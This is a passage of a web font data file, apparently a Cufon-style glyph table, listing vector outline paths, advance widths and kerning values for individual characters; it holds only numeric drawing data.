,-406,304,-709,709,-709v405,0,710,302,710,709v0,407,-302,709,-710,709v-407,0,-709,-302,-709,-709xm1426,-678v0,-371,-278,-648,-648,-648v-369,0,-647,277,-647,648v0,372,275,648,647,648v371,0,648,-276,648,-648xm478,-943v2,-113,-2,-127,-92,-135r0,-36r386,0v168,-5,297,81,297,224v0,131,-92,189,-222,222r209,298v43,52,51,80,121,88r0,33r-184,0r-294,-405r-76,0r0,309v13,55,40,62,118,63r0,33r-367,0r0,-33v96,-7,104,-22,104,-138r0,-523xm908,-879v4,-138,-143,-231,-285,-175r0,357v165,8,281,-47,285,-182","w":1557},{"d":"1218,-144r-1071,-455r0,-79r1071,-452r0,95r-955,397r955,398r0,96","w":1365},{"d":"219,-568v-64,-2,-102,-52,-102,-124v0,-50,53,-102,104,-102v56,0,112,53,110,109v-1,57,-42,119,-112,117xm226,27v-60,0,-103,-60,-104,-110v-2,-56,52,-110,108,-110v56,0,100,50,100,109v0,59,-47,111,-104,111","w":448},{"d":"169,-8v-65,1,-117,7,-184,1v0,-10,0,-14,4,-25v22,-13,40,-6,72,-9v110,-9,118,-12,151,-80v163,-337,252,-684,404,-1070v14,-37,31,-87,51,-150v21,-2,42,-2,64,-1v59,116,83,196,135,338r317,868v28,47,19,57,75,69v44,10,85,23,109,34v5,15,5,17,1,32r-325,-5r-121,2v-30,-3,-66,2,-88,-9v0,-9,2,-18,5,-27v50,-19,140,-5,189,-25v15,-46,2,-47,-20,-120v-10,-34,-23,-65,-32,-95v-9,-30,-44,-129,-106,-296v-110,-16,-228,-6,-349,-6v-23,0,-48,2,-75,5v-42,105,-67,210,-105,318v-37,105,-56,162,-56,173v0,6,3,16,9,30v51,14,130,16,192,23v13,11,13,14,8,31v-30,1,-53,1,-69,1xm466,-632v71,4,153,6,244,6v52,0,98,-2,137,-5v-54,-174,-123,-331,-186,-496r-10,-18v-67,151,-144,358,-191,509xm827,-1699v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":1387},{"d":"40,-1242v-17,-56,69,-39,123,-39r421,-3v5,21,7,24,2,44v-66,19,-162,-19,-187,51v-20,188,-7,406,-7,609v0,181,9,293,18,338v30,142,173,205,334,209v208,5,325,-58,390,-185v51,-100,50,-323,41,-488r-15,-287v-7,-221,-12,-214,-192,-260v-3,-9,-5,-19,-6,-29v65,-10,182,5,233,4r189,-4r-1,36v-82,11,-131,24,-147,38v-38,52,-24,100,-20,214r7,207r2,186v0,223,-2,304,-57,424v-60,131,-230,206,-419,211v-199,4,-294,-37,-389,-111v-103,-80,-127,-148,-129,-328r-3,-349r3,-378v-2,-56,-4,-97,-48,-97v-45,0,-127,3,-143,-13","w":1451,"k":{"\u00c5":141,"\u00c4":141,"A":141,".":193,",":193}},{"d":"307,-1006v91,-160,154,-269,191,-326r57,0r191,325r-4,26r-186,-183r-40,-36r-206,223v-4,-10,-3,-17,-3,-29xm166,-696v0,-11,-5,-20,-16,-29r-117,-28r0,-32r108,2v50,-4,144,-1,154,0r-6,381v0,117,3,191,11,220v25,105,194,118,296,66v44,-22,83,-45,114,-74v10,-105,9,-227,9,-339v0,-108,-5,-169,-16,-183v-1,-19,-123,-32,-173,-39v-8,-14,-9,-19,-5,-31v90,-6,241,0,321,-2r2,73r-10,457r4,136v13,29,29,22,74,24v9,0,33,2,74,6r1,30v-117,24,-185,49,-273,74v-10,-58,-2,-90,-6,-151v-88,62,-180,154,-311,154v-172,0,-241,-132,-238,-344v-1,-23,6,-91,5,-103","w":1003},{"d":"494,28v-265,0,-456,-221,-351,-472v46,-110,109,-135,243,-195v-122,-67,-160,-88,-216,-194v-117,-222,82,-464,307,-464v239,0,426,196,321,416v-43,90,-101,122,-210,178v164,91,186,79,254,205v133,249,-80,526,-348,526xm481,-1250v-163,-4,-279,174,-210,332v35,79,70,85,166,150v16,10,72,26,106,42v113,-57,171,-140,171,-279v0,-151,-86,-241,-233,-245xm491,-21v151,2,262,-110,262,-261v0,-83,-25,-149,-75,-198v-50,-49,-130,-94,-243,-137v-94,49,-130,82,-170,167v-18,38,-25,92,-25,160v0,167,111,267,251,269","w":960},{"d":"1375,6v5,-70,-1,-129,0,-195v-64,4,-98,-8,-148,2v-50,-2,-124,2,-161,-9v-1,-17,-1,-19,0,-35r65,-82v81,-106,145,-184,191,-235v15,-17,31,-39,50,-64v19,-25,40,-49,61,-72r47,0v-2,33,1,67,1,100v0,111,4,220,-1,334r127,0r0,60r-127,0v-1,60,-1,123,0,188v-26,17,-60,8,-105,8xm1375,-250r0,-286r-222,285xm372,71v54,-101,170,-260,218,-342v297,-506,515,-848,648,-1029v22,-2,63,3,63,2r-437,685r-199,329r-230,353xm374,-701v-5,57,117,5,100,75r-294,0v-8,-51,58,-35,88,-52v8,-55,6,-366,7,-519v-78,48,-124,72,-137,72v-9,1,-19,-7,-22,-15v8,-25,53,-42,93,-73v50,-38,75,-61,111,-87v26,0,59,-7,59,22","w":1664},{"d":"43,-32v15,-6,30,-10,45,-11v102,-7,160,-19,175,-37v44,-156,18,-607,18,-833v0,-91,7,-176,-5,-268v-1,-10,-6,-18,-11,-27v-23,-23,-188,-26,-213,-40v-5,-4,-8,-14,-9,-31r349,6v68,0,159,-2,272,-6v0,11,-1,21,-2,30v-54,17,-188,12,-202,49v-15,42,-17,136,-17,196r4,621v-1,55,-2,93,-2,113v3,110,-9,145,25,188v31,40,151,25,187,49v3,12,3,18,3,30v-61,2,-105,3,-134,3v-17,0,-46,-3,-89,-3r-392,1","w":725},{"d":"1387,6v5,-70,-1,-129,0,-195v-64,4,-98,-8,-148,2v-50,-2,-124,2,-161,-9v-1,-17,-1,-19,0,-35r65,-82v81,-106,145,-184,191,-235v15,-17,31,-39,50,-64v19,-25,40,-49,61,-72r47,0v-2,33,1,67,1,100v0,111,4,220,-1,334r127,0r0,60r-127,0v-1,60,-1,123,0,188v-26,17,-60,8,-105,8xm1387,-250r0,-286r-222,285xm380,67v54,-101,170,-260,218,-342v297,-506,515,-848,648,-1029v22,-2,63,3,63,2r-437,685r-199,329r-230,353xm402,-1148v-1,-55,-47,-90,-108,-90v-55,0,-105,34,-151,102r-37,-17v43,-96,104,-146,222,-151v85,-4,170,49,170,114v0,79,-51,102,-118,153v108,11,182,73,182,180v0,143,-144,247,-309,247v-71,0,-121,-12,-154,-28v-46,-22,-25,-72,22,-70v15,0,32,6,51,18v45,29,81,44,110,44v93,2,174,-86,174,-182v0,-76,-44,-148,-123,-147v-27,0,-58,14,-94,42r-24,-34v23,-17,43,-32,62,-43v83,-53,125,-99,125,-138","w":1685},{"d":"595,-904v101,-135,-1,-297,-160,-297v-100,0,-188,64,-264,193r-33,-18v72,-171,154,-268,353,-278v147,-8,269,100,270,210v0,49,-16,98,-49,147v-33,49,-91,105,-174,166v208,-11,328,141,331,341v4,261,-228,468,-502,468v-111,0,-190,-20,-245,-48v-62,-32,-51,-117,18,-118v22,0,49,12,80,36v74,57,138,85,193,85v174,0,316,-176,316,-368v0,-157,-85,-300,-228,-301v-49,0,-101,23,-154,70r-24,-40v95,-80,211,-166,272,-248","w":960},{"d":"94,-494v19,-79,69,-186,131,-234v79,-62,134,-92,256,-94v139,-2,223,67,271,150v31,53,42,91,40,144r-477,3v-31,0,-62,1,-94,4v-15,42,-9,64,-9,110v0,101,72,239,148,285v65,40,184,61,270,35v45,-14,128,-73,168,-110v2,18,8,35,5,55v-55,72,-155,142,-254,163v-329,69,-531,-195,-455,-511xm652,-622v-6,-90,-75,-153,-178,-153v-120,0,-234,107,-240,211v103,1,134,-16,351,-16v49,0,62,-16,67,-42","w":853,"k":{"p":-25,".":39,",":27}},{"d":"832,-791v20,-2,49,-4,49,17v0,14,-14,21,-29,21v-66,13,-95,20,-118,80r-235,623r-124,337v-33,74,-73,166,-125,192v-25,13,-47,26,-83,26v-97,0,-117,-115,-36,-139r13,-3v59,11,96,16,111,16v14,-7,24,-16,31,-26v46,-63,119,-206,119,-284v0,-23,-10,-55,-26,-99r-111,-294v-15,-38,-61,-162,-137,-372v-5,-13,-11,-23,-18,-30v-30,-10,-56,-21,-89,-29v-18,-4,-20,-19,-12,-33v50,-4,99,-6,150,-4r85,3v56,-2,120,-4,168,5v4,10,5,15,3,24v-32,17,-131,14,-154,36v-6,28,11,47,19,77v14,50,46,145,95,286v35,102,68,190,98,263v68,-157,148,-359,192,-545v15,-63,0,-86,-59,-99v-48,-10,-73,-19,-77,-22v-4,-3,-6,-10,-7,-20v30,-18,93,-7,143,-7r164,0xm628,-1056v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm284,-1056v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":853},{"d":"236,-5r-221,9r-1,-27v16,-25,154,-29,187,-41v32,-35,28,-88,34,-216r45,-930v-48,-10,-124,-21,-228,-32v-12,-20,-14,-21,-3,-41v60,-15,108,5,196,5v38,0,149,-15,187,-2v28,31,39,74,57,113r400,889v160,-317,222,-495,347,-812v42,-105,60,-168,67,-183v13,-5,24,-7,33,-7r223,5v52,0,95,-1,128,-2v3,17,3,19,-1,35v-57,36,-195,5,-220,56v-10,20,-12,135,-12,186v0,100,8,268,8,504r0,322v4,88,-9,92,47,113v35,13,95,24,176,37v10,7,7,19,6,33v-70,2,-191,-7,-248,-7v-137,0,-227,2,-272,4v-40,2,-46,7,-67,-1v0,-12,0,-21,3,-32v22,-9,53,-12,90,-19v43,-8,73,-23,92,-36v20,-124,-1,-324,9,-480v4,-60,4,-158,4,-293v0,-107,-3,-189,-8,-244r-232,546r-53,135r-69,164r-100,263r-23,-1v-102,-320,-363,-902,-489,-1135v-22,255,-56,716,-17,1019v9,70,50,69,158,69v27,0,52,2,76,6v8,20,10,20,2,39","w":1707},{"d":"224,29v-56,0,-104,-53,-104,-110v0,-56,52,-110,108,-110v57,0,100,50,100,109v0,59,-47,111,-104,111","w":448},{"d":"856,-959v39,109,53,360,25,511v-33,171,-95,289,-189,388v-94,99,-278,122,-400,24v-125,-101,-220,-329,-220,-576v0,-203,57,-430,146,-538v74,-90,136,-154,270,-154v71,0,141,28,208,84v67,56,118,144,160,261xm746,-664v-2,-164,-7,-275,-18,-334v-30,-159,-90,-261,-240,-261v-114,0,-194,80,-222,190v-46,177,-55,780,22,929v69,134,233,169,342,74v111,-96,119,-373,116,-598","w":960},{"d":"377,-3v-97,0,-190,25,-298,23r-20,-5r1,-25v42,-22,152,-20,177,-59v6,-29,10,-82,9,-159r-14,-778v-3,-59,13,-146,-12,-184v-17,-27,-156,-25,-158,-65v-1,-15,18,-22,30,-21r89,2r505,-7r374,-13v12,0,23,3,32,10v10,21,5,37,6,63r9,179v0,7,-1,17,-2,28v-35,17,-53,2,-53,-41v0,-41,-25,-137,-74,-155v-100,-37,-340,-17,-476,-17v-57,0,-106,4,-100,72v12,146,-9,319,6,461v133,-4,342,17,436,-17v56,-20,45,-27,70,-112r13,-83v16,-7,18,-8,34,-1v3,15,4,39,5,70r12,368v-17,7,-23,9,-37,5v-11,-67,-27,-119,-50,-157v-8,-13,-17,-20,-27,-23v-24,-7,-316,-6,-411,-2v-20,0,-34,3,-43,8v-10,71,-2,77,-3,186r-2,331v0,9,3,21,8,35v38,28,132,25,181,49v29,15,39,40,10,51v-55,-11,-130,-17,-227,-17","w":1152,"k":{"\u00f6":78,"\u00e5":51,"\u00e4":51,"\u00c5":129,"\u00c4":129,"r":27,"o":78,"e":90,"a":51,"A":129,".":231,",":205}},{"d":"788,-736v41,-12,32,-41,58,-109r37,0r-1,803r3,116r-3,339v-1,64,78,67,130,81v9,10,10,16,8,29r-314,-4v-39,0,-81,1,-127,3v-5,-14,-6,-16,0,-29v91,-18,138,-29,143,-32v11,-6,19,-18,23,-35v22,-78,14,-396,13,-519v-83,41,-221,95,-299,92v-217,-8,-385,-161,-389,-385v-4,-228,199,-416,427,-416v77,0,221,62,291,66xm227,-422v0,231,210,384,446,318v43,-12,68,-30,79,-42v7,-130,11,-385,-15,-456v-30,-83,-116,-157,-230,-157v-173,0,-280,153,-280,337","w":1003},{"d":"804,1r-177,6v-23,-53,66,-46,107,-62v8,-7,14,-14,14,-21v1,-170,27,-382,-7,-526v-24,-100,-174,-147,-280,-93v-39,20,-123,93,-143,131v-23,45,-6,142,-13,209v4,32,-2,225,7,281v59,16,119,24,174,46v3,10,4,15,-2,27r-294,2r-129,4v-7,-1,-17,-1,-30,-2v-2,-11,0,-16,7,-27v78,-14,123,-24,135,-32v19,-14,10,-66,10,-98r0,-605v5,-105,2,-352,-1,-369v-4,-29,-10,-48,-18,-56v-16,-15,-60,-31,-132,-48r2,-25v87,-12,185,-51,225,-75r49,0r2,468r-4,202v0,12,1,25,2,40v78,-91,107,-123,203,-164v188,-80,375,34,370,253r-10,404v0,17,1,41,2,70r145,35r-1,31","k":{"y":39}},{"d":"1002,-1487v60,-9,77,-47,88,-121r29,0v11,116,-61,201,-164,204v-113,3,-184,-120,-288,-120v-64,0,-77,44,-90,118r-28,0v-14,-122,93,-243,231,-190v42,16,179,116,222,109xm132,-410v-42,-118,-52,-287,-14,-410v37,-118,126,-259,223,-328v108,-77,271,-151,485,-144v263,9,424,96,552,260v75,96,124,227,124,380v0,186,-30,279,-111,391v-62,86,-207,201,-350,245v-216,66,-519,24,-655,-70v-96,-66,-209,-197,-254,-324xm1320,-639v0,-353,-172,-616,-521,-616v-209,0,-347,89,-425,239v-78,148,-126,354,-73,558v51,197,149,340,318,410v167,70,393,14,504,-70v136,-103,197,-293,197,-521","w":1600},{"d":"474,-988v0,-47,40,-87,88,-87v47,0,87,40,87,87v0,47,-40,87,-88,87v-47,0,-87,-40,-87,-87xm1101,-640r-1078,0r0,-82r1078,0r0,82xm474,-367v0,-47,40,-88,88,-88v48,0,88,41,88,88v0,47,-41,88,-88,88v-47,0,-88,-41,-88,-88","w":1124},{"d":"209,1v-62,0,-137,13,-199,9r4,-27v14,-5,44,-6,89,-15v107,-23,92,-14,147,-67v41,-39,71,-76,94,-105v10,-13,36,-42,78,-88v105,-117,184,-216,237,-296v-103,-133,-201,-266,-293,-398v-92,-132,-150,-207,-174,-224v-8,-6,-46,-12,-114,-18v-25,-2,-44,-4,-55,-6v-5,-17,-8,-26,-4,-40r115,-3r235,14v32,2,76,3,133,3v39,0,96,-22,143,-9v4,12,6,17,4,27v-52,25,-234,4,-194,98v46,107,222,316,308,432v65,-70,279,-404,283,-414v22,-50,-9,-78,-57,-87v-70,-13,-83,-12,-110,-25v-8,-16,-10,-22,-6,-36r385,-3v39,2,83,-2,117,5r2,20r-123,43v-119,58,-94,57,-196,173v-84,96,-136,182,-220,287v-17,21,-33,44,-50,69v5,12,16,23,24,34r298,400v63,87,108,145,137,171v52,47,85,46,195,58v6,16,8,22,6,37v-86,3,-145,-12,-251,-12v-111,0,-249,3,-347,11v-7,0,-15,-1,-24,-2v-6,-17,-7,-18,0,-34v62,-3,114,-15,168,-27v12,-3,20,-13,25,-26v-35,-85,-75,-127,-167,-258v-75,-107,-132,-179,-163,-218v-16,8,-293,377,-279,369v-27,51,-32,98,19,123v18,9,82,22,191,39v2,16,3,19,1,34v-55,3,-59,-6,-155,-13v-122,-8,-208,-5,-257,-5","w":1429,"k":{"\u00d6":63,"O":63,"G":90,"C":51}},{"d":"66,-356v-18,-16,-10,-42,-9,-73r298,-433v48,-71,88,-128,121,-170v33,-42,65,-88,97,-136v32,-48,65,-93,98,-136r46,0r2,184v-13,218,6,439,-2,665r160,2r56,-2v3,44,3,48,0,92r-157,2v-11,0,-30,-1,-59,-2v-1,95,-1,220,0,377v-34,18,-77,7,-136,8v2,-79,4,-135,3,-169r-5,-160v0,-12,1,-31,2,-56v-101,15,-169,-13,-270,6v-65,-8,-137,1,-197,-9xm581,-455r0,-629v-73,90,-381,554,-426,629v29,-1,51,-2,66,-2r274,4v20,0,49,-1,86,-2","w":960},{"d":"479,-1435v91,-160,154,-269,191,-326r57,0r191,325r-4,26r-186,-183r-40,-36r-206,223v-4,-10,-3,-17,-3,-29xm169,-8v-65,1,-117,7,-184,1v0,-10,0,-14,4,-25v22,-13,40,-6,72,-9v110,-9,118,-12,151,-80v163,-337,252,-684,404,-1070v14,-37,31,-87,51,-150v21,-2,42,-2,64,-1v59,116,83,196,135,338r317,868v28,47,19,57,75,69v44,10,85,23,109,34v5,15,5,17,1,32r-325,-5r-121,2v-30,-3,-66,2,-88,-9v0,-9,2,-18,5,-27v50,-19,140,-5,189,-25v15,-46,2,-47,-20,-120v-10,-34,-23,-65,-32,-95v-9,-30,-44,-129,-106,-296v-110,-16,-228,-6,-349,-6v-23,0,-48,2,-75,5v-42,105,-67,210,-105,318v-37,105,-56,162,-56,173v0,6,3,16,9,30v51,14,130,16,192,23v13,11,13,14,8,31v-30,1,-53,1,-69,1xm466,-632v71,4,153,6,244,6v52,0,98,-2,137,-5v-54,-174,-123,-331,-186,-496r-10,-18v-67,151,-144,358,-191,509","w":1387},{"d":"1031,-866v-10,59,-9,338,4,440v0,6,-1,14,-3,24v-8,4,-11,4,-20,4v-26,-43,-56,-195,-86,-214v-68,-44,-206,-22,-318,-22v-93,0,-153,2,-182,6r0,446v6,120,-9,139,87,140r258,2v329,1,359,-26,467,-256v17,-37,29,-52,58,-33v-37,123,-46,152,-46,273v0,22,-5,40,-16,55r-851,6r-308,9v-22,1,-28,-10,-25,-30v24,-30,179,-17,195,-37v21,-26,13,-82,13,-126r0,-625r-5,-285v-5,-141,6,-126,-120,-137v-39,-3,-97,2,-75,-43v6,-3,11,-5,16,-5r156,6v83,-4,167,4,250,2r306,-6v15,0,53,2,114,4v52,2,111,4,159,2r83,-3v34,7,8,76,8,101v0,69,7,128,7,176v0,12,-17,8,-26,5v-29,-60,-71,-181,-124,-228v-142,-24,-336,-3,-502,-5v-37,0,-59,5,-66,14v-11,16,-17,63,-17,141v0,4,7,285,5,379v143,12,307,11,460,1v86,-6,69,-23,85,-115v10,-61,12,-98,57,-81v1,5,2,10,2,15","w":1344},{"d":"1322,-787v22,0,61,-10,61,15v0,7,-1,15,-3,24v-94,15,-95,32,-153,113r-179,430v-19,44,-80,175,-119,247v-10,7,-21,6,-35,1v-17,-23,-122,-306,-172,-417v-109,227,-181,367,-215,419v-19,3,-22,3,-41,0r-189,-395r-173,-338v-20,-55,-65,-50,-125,-62v-1,-18,-2,-22,0,-38r384,1v29,-2,20,37,4,44v-76,8,-107,5,-102,69v57,150,186,396,269,569v68,-119,123,-229,165,-331r-87,-226v-25,-66,-14,-49,-85,-74v-46,-16,-76,-9,-58,-47v128,-14,294,-2,440,-4r-2,32v-42,24,-153,7,-162,59v4,46,11,60,33,117r107,282v31,84,55,143,72,176v47,-81,126,-306,190,-444v26,-56,45,-101,12,-144v-13,-16,-105,-34,-134,-45v-9,-14,-5,-20,6,-33r222,2v20,0,43,-2,69,-2","w":1365,"k":{"\u00f6":51,"\u00e5":27,"\u00e4":27,"q":27,"p":-72,"o":51,"e":27,"d":27,"c":27,"a":27,".":231,",":217}},{"d":"234,-773v126,38,398,-8,559,7v2,17,2,35,-5,45v-71,116,-198,259,-288,369r-255,310r307,2v121,-2,180,-96,210,-198v12,-8,27,-7,35,5v-13,67,-22,197,-43,239r-700,-3r1,-21v79,-89,135,-155,167,-196r80,-102v128,-153,191,-206,326,-393v-15,-10,-40,-6,-62,-7v-77,-2,-254,-2,-318,22v-50,19,-98,76,-118,115v-6,14,-30,43,-45,20r43,-131v22,-74,42,-133,60,-176r36,0v-1,33,-23,83,10,93","w":875},{"d":"1,-11v77,-119,152,-262,224,-393r-134,-236v-15,-24,-29,-55,-49,-91v-19,-33,-34,-55,-41,-68r57,0r318,395r-91,124r-149,183v-24,29,-50,58,-78,86r-57,0xm363,-799r46,0r62,78r167,192v23,32,89,112,101,125r-186,238v-63,81,-105,132,-128,155r-62,0r213,-375v1,-3,4,-9,8,-18v-20,-41,-50,-94,-89,-160","w":747},{"d":"-44,448v57,-54,123,-112,165,-175v114,-171,155,-236,199,-431v35,-156,32,-374,-2,-520v-35,-153,-133,-342,-216,-450v-8,-11,-51,-56,-129,-134r20,-49v139,82,246,243,323,384v79,144,122,380,122,538v0,342,-137,605,-334,799v-34,35,-75,65,-122,90v-7,-17,-15,-34,-26,-52","w":597},{"d":"341,-582v-56,0,-104,-53,-104,-110v0,-56,52,-110,108,-110v57,0,100,50,100,109v0,61,-46,111,-104,111","w":683},{"d":"216,-1115v-50,0,-88,-42,-88,-95v0,-49,39,-89,87,-89v49,0,90,39,88,90v-1,48,-30,94,-87,94xm42,516v69,-80,132,-156,140,-299v4,-77,9,-144,9,-202r-1,-226v1,-195,-4,-321,-4,-378v0,-92,-38,-79,-123,-92r2,-38v87,-22,151,-59,190,-111v13,-11,23,-43,50,-29r10,778v-2,240,-10,312,-93,451v-31,52,-96,114,-150,161r-14,8v-6,-5,-11,-13,-16,-23","w":469},{"d":"734,-416v14,-170,-30,-309,-175,-309v-108,0,-209,61,-261,129r3,387v8,117,-14,130,64,147v60,13,96,2,91,59v-76,-5,-127,-8,-153,-8r-265,8v-4,-14,-2,-15,2,-32v23,-18,84,-15,106,-31v13,-9,20,-24,24,-43v10,-37,11,-493,-6,-528v-30,-18,-56,-21,-103,-33r0,-33v106,-34,119,-60,197,-152v14,0,30,-3,38,4r1,189v71,-65,135,-110,192,-136v39,-17,82,-26,131,-26v138,0,178,51,235,152v97,-92,164,-158,308,-158v162,0,257,115,257,290r0,408v-1,27,5,48,18,62v4,9,111,16,106,46v-2,6,1,27,-13,26v-127,-9,-246,-5,-386,-2v-2,-17,-2,-22,6,-36v28,-17,122,-16,133,-46v24,-66,8,-509,4,-498v-11,-138,-183,-202,-310,-128v-38,22,-75,52,-112,94r-5,296v0,121,0,190,3,207v10,50,28,45,96,57v32,6,56,4,57,34v1,31,-48,17,-76,17r-371,1v-2,-16,-2,-21,-1,-34v26,-16,105,-23,146,-40v26,-27,22,-144,21,-209","w":1579,"k":{"\u00fc":27,"y":27,"u":27}},{"d":"43,-32v15,-6,30,-10,45,-11v102,-7,160,-19,175,-37v44,-156,18,-607,18,-833v0,-91,7,-176,-5,-268v-1,-10,-6,-18,-11,-27v-23,-23,-188,-26,-213,-40v-5,-4,-8,-14,-9,-31r349,6v68,0,159,-2,272,-6v0,11,-1,21,-2,30v-54,17,-188,12,-202,49v-15,42,-17,136,-17,196r4,621v-1,55,-2,93,-2,113v3,110,-9,145,25,188v31,40,151,25,187,49v3,12,3,18,3,30v-61,2,-105,3,-134,3v-17,0,-46,-3,-89,-3r-392,1xm215,-1622v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217","w":725},{"d":"564,-1228r-9,1091v-15,93,109,58,162,94v10,7,11,25,9,41r-458,0v-4,-42,6,-44,50,-52v39,-8,70,-18,94,-29v22,-73,12,-89,13,-204r4,-529r-2,-137v0,-20,1,-83,2,-189v-151,108,-234,162,-249,162v-16,0,-37,-27,-19,-41v39,-31,71,-42,136,-97v87,-73,141,-129,197,-179v66,-2,71,-4,70,69","w":960},{"d":"169,-8v-65,1,-117,7,-184,1v0,-10,0,-14,4,-25v22,-13,40,-6,72,-9v110,-9,118,-12,151,-80v163,-337,252,-684,404,-1070v14,-37,31,-87,51,-150v21,-2,42,-2,64,-1v59,116,83,196,135,338r317,868v28,47,19,57,75,69v44,10,85,23,109,34v5,15,5,17,1,32r-325,-5r-121,2v-30,-3,-66,2,-88,-9v0,-9,2,-18,5,-27v50,-19,140,-5,189,-25v15,-46,2,-47,-20,-120v-10,-34,-23,-65,-32,-95v-9,-30,-44,-129,-106,-296v-110,-16,-228,-6,-349,-6v-23,0,-48,2,-75,5v-42,105,-67,210,-105,318v-37,105,-56,162,-56,173v0,6,3,16,9,30v51,14,130,16,192,23v13,11,13,14,8,31v-30,1,-53,1,-69,1xm466,-632v71,4,153,6,244,6v52,0,98,-2,137,-5v-54,-174,-123,-331,-186,-496r-10,-18v-67,151,-144,358,-191,509","w":1387,"k":{"y":51,"w":78,"v":117,"u":39,"Y":129,"W":180,"V":231,"U":90,"T":63,"Q":51,"O":78,"G":78,"C":78}},{"d":"33,1v-25,4,-46,-8,-31,-29v40,-21,142,-26,154,-46v31,-53,23,-92,23,-226r1,-303v-5,-86,-36,-85,-124,-110r-1,-29v92,-21,163,-69,214,-144v15,-5,17,-5,32,0r3,467r-3,300v1,25,4,41,11,47v4,12,90,34,138,51r0,26v-127,-7,-302,-21,-417,-4xm426,-1056v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm82,-1056v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":469},{"d":"79,-398v0,-252,201,-442,483,-416r133,-374r38,1r-130,376v69,9,118,28,152,52v62,44,29,140,-45,140v-50,0,-129,-88,-141,-94r-206,586v27,41,107,67,171,65v111,-3,188,-56,261,-120v5,29,2,38,1,67v-45,43,-131,115,-209,130v-113,21,-181,21,-269,-13v-23,43,-98,287,-124,344r-38,-2v1,-10,69,-203,124,-362v-118,-69,-201,-216,-201,-380xm535,-736v-288,-86,-387,382,-208,579","w":853},{"d":"564,-357v-116,13,-203,1,-314,1v-83,0,-141,-4,-172,-11v-3,-29,-3,-43,4,-75r92,1r134,-5r98,3v49,-3,127,-2,156,7","w":640},{"d":"132,-45r-18,-189v1,-20,7,-19,31,-20v46,121,67,156,147,212v102,70,268,15,268,-104v0,-43,-19,-81,-47,-120v-51,-71,-307,-136,-355,-209v-26,-40,-45,-80,-45,-128v0,-225,305,-273,484,-180v6,36,11,118,15,182r-36,1v-29,-91,-114,-173,-213,-180v-112,-7,-173,128,-104,212v39,48,252,123,301,164v53,45,99,115,99,198v0,145,-138,238,-282,238v-85,0,-163,-16,-234,-47v-7,-5,-10,-15,-11,-30","w":747,"k":{".":78,",":63}},{"d":"845,-1311v120,0,282,43,340,87v10,66,14,128,11,201v-18,4,-21,4,-38,1v-52,-149,-177,-243,-372,-243v-132,0,-208,46,-283,103v-138,104,-215,295,-217,532v-3,375,155,631,518,611v224,-12,318,-112,400,-270v10,-4,15,-6,27,2v-1,16,-1,26,-2,31v-28,113,-48,190,-61,231v-96,32,-200,53,-353,52v-210,-1,-270,-23,-407,-89v-190,-91,-319,-281,-319,-559v0,-192,52,-295,139,-417v88,-124,216,-216,382,-255v55,-12,134,-18,235,-18","w":1301,"k":{".":39,",":51}},{"d":"971,-384v0,222,-220,420,-464,411v-246,-9,-434,-172,-434,-429v0,-176,112,-317,238,-376v61,-28,135,-42,222,-42v241,0,438,200,438,436xm227,-381v0,215,102,369,288,369v199,0,301,-169,301,-382v0,-187,-87,-395,-291,-387v-209,9,-298,157,-298,400","k":{"y":39,"x":39,"w":27,"v":27,".":102,",":90}},{"d":"92,-395v5,-246,181,-426,426,-426v125,0,212,47,282,115v-25,-153,-104,-285,-238,-394r-274,180r-31,-44r259,-171v-63,-46,-137,-85,-222,-118r29,-62v89,25,181,66,276,125r187,-123r30,45r-169,112v188,142,344,363,348,672v4,301,-178,508,-463,508v-242,0,-445,-184,-440,-419xm531,-14v215,0,303,-169,303,-429v0,-56,-4,-116,-13,-180v-69,-89,-150,-159,-283,-159v-204,0,-291,159,-291,402v0,216,96,366,284,366","w":1067},{"d":"598,-643v-36,1,-126,-56,-164,-25v-27,22,-100,122,-99,184r7,363v5,42,2,45,28,61v65,10,156,8,209,27v12,8,12,19,1,31r-316,-1r-223,6v-5,-14,-5,-19,5,-34r142,-27v25,-16,20,-31,20,-91v0,-227,-1,-358,-4,-393v-7,-77,-14,-74,-90,-88v-23,-3,-41,-8,-54,-13r4,-30v136,-55,168,-82,226,-192r34,1v6,26,4,166,7,258v36,-66,86,-131,145,-175v43,-33,81,-42,104,-42v57,-1,100,46,100,102v0,49,-40,77,-82,78","w":683,"k":{"\u00fc":-66,"y":-59,"v":-80,"u":-66,"t":-41,"r":-51,"q":27,"p":-25,"n":-41,"m":-76,"j":-51,":":-51,".":78,"-":39,",":51}},{"d":"-127,-12v3,-13,18,-16,37,-17v59,-4,121,-16,152,-57v26,-33,83,-144,177,-331r296,-587r110,-230v-40,-5,-138,-9,-191,-14v-10,-1,-16,-11,-18,-24v25,-20,65,-16,120,-14r122,4r379,4r259,-2v115,0,196,3,245,9v8,31,11,212,4,280r-24,-2v-6,-11,-15,-31,-26,-60v-31,-81,-60,-134,-88,-157v-16,-13,-41,-21,-76,-22v-143,-5,-231,-7,-264,-7v-58,1,-108,0,-141,15v-4,72,-6,129,-6,170r9,377v135,-15,258,1,392,-12v27,-56,45,-117,54,-182v11,-1,16,-1,29,0v7,150,-12,214,-2,370r3,89v-14,1,-21,1,-38,0v-10,-92,-20,-149,-29,-171v-31,-67,-57,-54,-179,-54v-95,0,-172,3,-229,8r-1,56v0,239,1,387,4,445v1,37,6,61,16,67v56,33,453,17,477,-2v33,-11,65,-33,96,-68v31,-35,73,-107,126,-217r29,-1v-1,52,-44,315,-57,357v-39,7,-116,-10,-169,-9r-937,11r-2,-25v36,-20,221,-18,241,-49v14,-7,15,-459,6,-561v-79,-5,-286,-11,-385,7v-5,5,-10,12,-14,21v-47,118,-223,435,-223,522v0,15,8,19,24,21v56,8,140,14,189,32v11,13,10,19,4,31v-101,-9,-191,-13,-268,-13v-111,0,-172,9,-182,9v-22,-1,-45,-1,-51,-17xm784,-1138v-4,-72,5,-91,-51,-95v-9,0,-17,3,-24,8v-71,105,-211,399,-282,547r2,8r350,-7r0,-303","w":1749},{"d":"94,-949r335,0r88,-416r87,0r-88,416r455